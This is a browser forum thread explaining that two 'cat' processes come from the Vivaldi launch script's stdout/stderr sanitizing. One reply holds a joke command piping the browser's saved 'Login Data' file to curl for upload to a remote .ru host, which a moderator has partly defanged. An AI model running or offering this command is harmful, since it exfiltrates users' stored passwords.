Solved CAT processes.

Hello.
Would somebody be so kind as to explain why i have 2 processes by the name of CAT running when vivaldi is open please.
To be assured this is not a complaint of any form but just a general enquiry as i have never witnessed such a thing before.
I use 32bit xenial puppy linux.Thank You kindly and best wishes.

The standard start script creates those as a security measure.
See lines 74ff (stable or snapshot) and respective link.If they are missing,
Vivaldi
was started in a non-standard way. -
@Priest72
Hi, I guess a extension produce it, because I donΒ΄t have them.
Check with a guest profile.Cheers, mib

cat "Login Data" | curl -T httx://somedudescomputer.ru
Seriously, we'd need to see the output of
ps
to know what this is caused by.modedit removed domain, know it is a joke, but could be misused by unexperienced users

concatenate hence cat seems to be a common unix/linux file manipulation process.
I only witness this when vivaldi is open.Thanks.

Thanks for the replies.
It is a common linux file reading/copying function.
I do not see this behaviour in other browsers and chromium does no such thing.It seems to be peculiar to the vivaldi browser.
Any insight for the reason for this.?.maybe from a linux coder here on the forum.This process is not nefarious by any means but i just need some clarification as to why this process runs.
Thank you and best wishes.

@Priest72 I think @becm tried to answer this before, but not in a very helpful way (what script, what link?)
Lines 74-78 from the Vivaldi startup script:
# Sanitize std{in,out,err} because they'll be shared with untrusted child # processes (http://crbug.com/376567). exec < /dev/null exec > >(exec cat) exec 2> >(exec cat >&2)
Apparently, this is done to replace the launching shell process so it won't take std input for security reasons:
https://www.computerhope.com/unix/bash/exec.htmThat's some seriously weird redirecting though, my bash skills are not good enough to process what those actually do. Any bash experts?

Ok so vivaldi has merely not inherited the fix yet which has been implemented in chromium.
cheers.

@Gwen-Dragon Got it.!
Thanks a lot for your patience.Best wishes.
Just one more thing please.Which version of chromium is the latest vivaldi based on please?
-
@Gwen-Dragon Thank you my good lady for your help,Much appreciated.
Stay safe and well. -
@Gwen-Dragon Or just open "Help/About"
-
@TbGbe Soooooo last millenium!
-
TBH I prefer the Dragon's method because I like to see, at a glance, when a new Snapshot has changed the Chromium build the moment I open it
